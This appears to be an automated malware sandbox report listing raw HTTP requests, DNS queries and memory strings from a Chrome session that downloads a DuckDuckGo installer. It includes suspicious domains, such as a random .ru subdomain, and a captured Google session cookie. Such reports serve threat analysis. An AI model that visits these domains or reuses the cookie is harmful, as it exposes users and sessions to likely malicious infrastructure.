Source: global trafficHTTP traffic detected: GET /04Pvf_aHNL0yjC-7q52a48eZichJB2J9m-q_JACGVUbjDQDlVdCVIVy2g24n79GsYTcm8fxk07rhPVvQHDRXzuV9Dg=s1280-w1280-h800 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gwvwew_KoIj3OsVAqLa2y4UkHSGJm_hp9BMkEAeb15HEyZHEmXTGVrCN4VB-mElofPRd8dlXSsFHbJPnYu2pbRr9Lg=s1280-w1280-h800 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /76r3coCYiap7WJa2ejEtQWUi079TowbnyCcrB1-HZy6Y0bohWW9uND5CaLQynHKafxPA0QZtokCNBJDREctbw7xD=s1280-w1280-h800 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /04Pvf_aHNL0yjC-7q52a48eZichJB2J9m-q_JACGVUbjDQDlVdCVIVy2g24n79GsYTcm8fxk07rhPVvQHDRXzuV9Dg=s192-w192-h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.7LPvRDgzcqA.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo9wdgl3D0Cd5pn6O1gZXHwWDc_oTg/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=KGe7l3jK8877iaHRUc9zyfLrgIW1kMsDKkq2YOK3gjuAd_rDEmmht_H9VyrpNB7w_bIW6BcaR2rkbpwhJBu_IoLrbUhapBL3w7UVfVYeP5-J7CWG1NnkF7fGNLW1kjqWd3EuQ_T0hQ1OKi9nCXS8iaUIDtZcZmfTt_oDW71xBw6MXUxYlseBPsLUlRE
Source: global trafficHTTP traffic detected: GET /gwvwew_KoIj3OsVAqLa2y4UkHSGJm_hp9BMkEAeb15HEyZHEmXTGVrCN4VB-mElofPRd8dlXSsFHbJPnYu2pbRr9Lg=s192-w192-h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /76r3coCYiap7WJa2ejEtQWUi079TowbnyCcrB1-HZy6Y0bohWW9uND5CaLQynHKafxPA0QZtokCNBJDREctbw7xD=s192-w192-h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /EfLqyLoo5-iga5l8oerPNmDlmJnUbZACbTAw0gOJhirRHXhLVgOaEa8BhqNNIzTjwUoSRObkvpBc3tICfQ0DV3EO=s192-w192-h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /LtBvUp3Og39KJjwrHuvaqaooDAjOS1drA8yvKNS4X8507y1sm5dYLRtDvr8ddiRjaXUMPIPwrVtWgBWrYUO5y8QM7A=s192-w192-h120 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.7LPvRDgzcqA.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo9wdgl3D0Cd5pn6O1gZXHwWDc_oTg/cb=gapi.loaded_1 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chromewebstore.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=KGe7l3jK8877iaHRUc9zyfLrgIW1kMsDKkq2YOK3gjuAd_rDEmmht_H9VyrpNB7w_bIW6BcaR2rkbpwhJBu_IoLrbUhapBL3w7UVfVYeP5-J7CWG1NnkF7fGNLW1kjqWd3EuQ_T0hQ1OKi9nCXS8iaUIDtZcZmfTt_oDW71xBw6MXUxYlseBPsLUlRE
Source: global trafficHTTP traffic detected: GET /js/googleapis.proxy.js?onload=startup HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://scone-pa.clients6.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=KGe7l3jK8877iaHRUc9zyfLrgIW1kMsDKkq2YOK3gjuAd_rDEmmht_H9VyrpNB7w_bIW6BcaR2rkbpwhJBu_IoLrbUhapBL3w7UVfVYeP5-J7CWG1NnkF7fGNLW1kjqWd3EuQ_T0hQ1OKi9nCXS8iaUIDtZcZmfTt_oDW71xBw6MXUxYlseBPsLUlRE
Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.7LPvRDgzcqA.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo9wdgl3D0Cd5pn6O1gZXHwWDc_oTg/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://scone-pa.clients6.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=KGe7l3jK8877iaHRUc9zyfLrgIW1kMsDKkq2YOK3gjuAd_rDEmmht_H9VyrpNB7w_bIW6BcaR2rkbpwhJBu_IoLrbUhapBL3w7UVfVYeP5-J7CWG1NnkF7fGNLW1kjqWd3EuQ_T0hQ1OKi9nCXS8iaUIDtZcZmfTt_oDW71xBw6MXUxYlseBPsLUlRE
Source: global trafficHTTP traffic detected: GET /js/googleapis.proxy.js?onload=startup HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=KGe7l3jK8877iaHRUc9zyfLrgIW1kMsDKkq2YOK3gjuAd_rDEmmht_H9VyrpNB7w_bIW6BcaR2rkbpwhJBu_IoLrbUhapBL3w7UVfVYeP5-J7CWG1NnkF7fGNLW1kjqWd3EuQ_T0hQ1OKi9nCXS8iaUIDtZcZmfTt_oDW71xBw6MXUxYlseBPsLUlRE
Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.7LPvRDgzcqA.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo9wdgl3D0Cd5pn6O1gZXHwWDc_oTg/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=KGe7l3jK8877iaHRUc9zyfLrgIW1kMsDKkq2YOK3gjuAd_rDEmmht_H9VyrpNB7w_bIW6BcaR2rkbpwhJBu_IoLrbUhapBL3w7UVfVYeP5-J7CWG1NnkF7fGNLW1kjqWd3EuQ_T0hQ1OKi9nCXS8iaUIDtZcZmfTt_oDW71xBw6MXUxYlseBPsLUlRE
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___details/DuckDuckGo.appinstaller HTTP/1.1Accept-Encoding: gzip, deflateHost: staticcdn.duckduckgo.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzip, deflateRange: bytes=912523264-912614737Host: staticcdn.duckduckgo.com
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzip, deflateIf-Match: "5925754a576d519f9df83fc149834c65-109"Range: bytes=912392192-912523263If-Unmodified-Since: Tue, 24 Sep 2024 14:44:30 GMTHost: staticcdn.duckduckgo.com
Source: global trafficHTTP traffic detected: GET /d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzip, deflateIf-Match: "5925754a576d519f9df83fc149834c65-109"Range: bytes=911736832-911867903If-Unmodified-Since: Tue, 24 Sep 2024 14:44:30 GMTHost: staticcdn.duckduckgo.com
Source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: F/WindowsBrowser/Images/Facebook.pnghttp://www.example.com/AppxBlockMap.xml equals www.facebook.com (Facebook)
Source: chromecache_341.2.drString found in binary or memory: Kf=w(["https://sandbox.google.com/tools/feedback/"]),Lf=w(["https://www.google.cn/tools/feedback/"]),Mf=w(["https://help.youtube.com/tools/feedback/"]),Nf=w(["https://asx-frontend-staging.corp.google.com/inapp/"]),Of=w(["https://asx-frontend-staging.corp.google.com/tools/feedback/"]),Pf=w(["https://localhost.corp.google.com/inapp/"]),Qf=w(["https://localhost.proxy.googlers.com/inapp/"]),Rf=V(tf),Sf=[V(uf),V(vf)],Tf=[V(wf),V(xf),V(yf),V(zf),V(Af),V(Bf),V(Cf),V(Df),V(Ef),V(Ff)],Uf=[V(Gf),V(Hf)],Vf= equals www.youtube.com (Youtube)
Source: chromecache_254.2.drString found in binary or memory: Math.round(q);u["gtm.videoElapsedTime"]=Math.round(f);u["gtm.videoPercent"]=r;u["gtm.videoVisible"]=t;return u},bk:function(){e=zb()},nd:function(){d()}}};var gc=la(["data-gtm-yt-inspected-"]),LC=["www.youtube.com","www.youtube-nocookie.com"],MC,NC=!1; equals www.youtube.com (Youtube)
Source: chromecache_254.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=rA(a,c,e);Q(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return Q(122),!0;if(d&&f){for(var m=Kb(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},uA=function(){var a=[],b=function(c){return pb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
Source: chromecache_254.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={hh:e,fh:f,gh:g,Rh:k,Sh:m,He:n,Cb:b},q=C.YT;if(q)return q.ready&&q.ready(d),b;var r=C.onYouTubeIframeAPIReady;C.onYouTubeIframeAPIReady=function(){r&&r();d()};F(function(){for(var t=E.getElementsByTagName("script"),v=t.length,u=0;u<v;u++){var w=t[u].getAttribute("src");if(WC(w,"iframe_api")||WC(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!NC&&UC(x[A],p.He))return wc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_206.2.dr, chromecache_246.2.drString found in binary or memory: inline:{css:1},disableRealtimeCallback:!1,drive_share:{skipInitCommand:!0},csi:{rate:.01},client:{cors:!1},signInDeprecation:{rate:0},include_granted_scopes:!0,llang:"en",iframes:{youtube:{params:{location:["search","hash"]},url:":socialhost:/:session_prefix:_/widget/render/youtube?usegapi=1",methods:["scroll","openwindow"]},ytsubscribe:{url:"https://www.youtube.com/subscribe_embed?usegapi=1"},plus_circle:{params:{url:""},url:":socialhost:/:session_prefix::se:_/widget/plus/circle?usegapi=1"}, equals www.youtube.com (Youtube)
Source: chromecache_254.2.drString found in binary or memory: var YB=function(a,b,c,d,e){var f=Pz("fsl",c?"nv.mwt":"mwt",0),g;g=c?Pz("fsl","nv.ids",[]):Pz("fsl","ids",[]);if(!g.length)return!0;var k=Uz(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);Q(121);if(m==="https://www.facebook.com/tr/")return Q(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!Cy(k,Ey(b, equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: www.444317.com
Source: global trafficDNS traffic detected: DNS query: gzevp.castragouse.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru
Source: global trafficDNS traffic detected: DNS query: duckduckgo.com
Source: global trafficDNS traffic detected: DNS query: improving.duckduckgo.com
Source: global trafficDNS traffic detected: DNS query: staticcdn.duckduckgo.com
Source: global trafficDNS traffic detected: DNS query: chrome.google.com
Source: global trafficDNS traffic detected: DNS query: chromewebstore.google.com
Source: global trafficDNS traffic detected: DNS query: lh3.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: play.google.com
Source: global trafficDNS traffic detected: DNS query: apis.google.com
Source: global trafficDNS traffic detected: DNS query: scone-pa.clients6.google.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2727sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 91fa21b380c2c82sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 03:08:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iY8t1GJjaPxMe6k27xxXb3Q81XqYo1trRmM5GarmCLIhiYPWFYzS711KMvWTcKCPu0NCnHVzFHNyw%2FN4cMXrCj%2B%2BbYjORqbee%2BALnfokBiJlsGtauvlGGT1nTD4XLg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingSpeculation-Rules: "/cdn-cgi/speculation"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8cf2eda25b9419c3-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 03:08:47 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: xli2b4jcJwYin/bvmaL3QvOGLTkE3URUTo4=$LVrylXwZgsnCXOCMcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8cf2edadd95d6a4f-EWR
